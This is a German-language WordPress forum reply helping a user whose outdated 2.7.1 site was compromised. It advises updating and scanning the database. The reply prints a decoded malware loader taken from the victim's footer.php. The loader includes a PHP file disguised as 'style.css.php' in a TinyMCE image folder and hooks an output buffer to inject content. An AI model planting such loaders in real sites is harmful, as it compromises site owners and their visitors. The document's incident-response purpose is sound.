Mojn,
Zitat
Wordpressversion 2.7.1 auf V-Server gehostet.
Ich denke, da haben wir die Antwort.
Deine WordPress Version ist nicht aktuell und vermutlich hat der Skripter eine Sicherheitslücke ausgenutzt.
Mittlerweile sind wir bei Version 3.1.3 und inzwischen wurden nicht nur Grundlegende Funktionsänderungen gemacht, sondern auch teilweise recht pikante Sicherheitslücken geschlossen.
Die von dir angegebene Zeile mit dem eval Code sagt im Klartext dieses hier aus;
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/var/www/web20/html/wp-includes/js/tinymce/themes/advanced/skins/default/img/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}
Ich kenne mich ein wenig mit Artisteer generierten Themes aus, da ich selber Themes verwende, die mit diesem Programm erstellt wurden.
Doch der Quelltext in deiner footer.php sieht total anders aus, als der von mir, was aber nichts heißen will, da bei deinem Theme eine andere Version verwendet wurde, als bei mir.
Was mich allerdings stutzig macht, sind diese Sachen am Ende deiner footer.php;
<?php
ob_start();
wp_footer();
$content = ob_get_clean();
if (strlen($content)) echo '<div>' . $content . '</div>';
?>
Ich weiß nicht wofür das gut sein soll, wenn ich ehrlich bin.
Die footer.php sieht bei mir so aus;
<?php
$content = ob_get_clean();
echo art_parse_template(art_page_template(), art_page_variables(array('content'=> $content)));
?>
<div id="wp-footer">
<?php wp_footer(); ?>
<!-- <?php printf(__('%d queries. %s seconds.', THEME_NS), get_num_queries(), timer_stop(0, 3)); ?> -->
</div>
</body>
</html>
Also wie du sieht ziemlich anders, was aber auch nicht aussagekräftig ist, da das Theme ja noch von Hand nachträglich umgebaut worden sein könnte.
Nachtrag;
Es kann überigends auch sein, dass sich der Schadcode noch zusätzlich in deiner Datenbank befindet.
Es gibt diverse Exploit Scanner, mit denen du die Datenbank durchsuchen kannst.
Gibt diverse Forenbeiträge diesbezüglich.
http://forum.wordpress-deutschland.org/search.php?searchid=2123787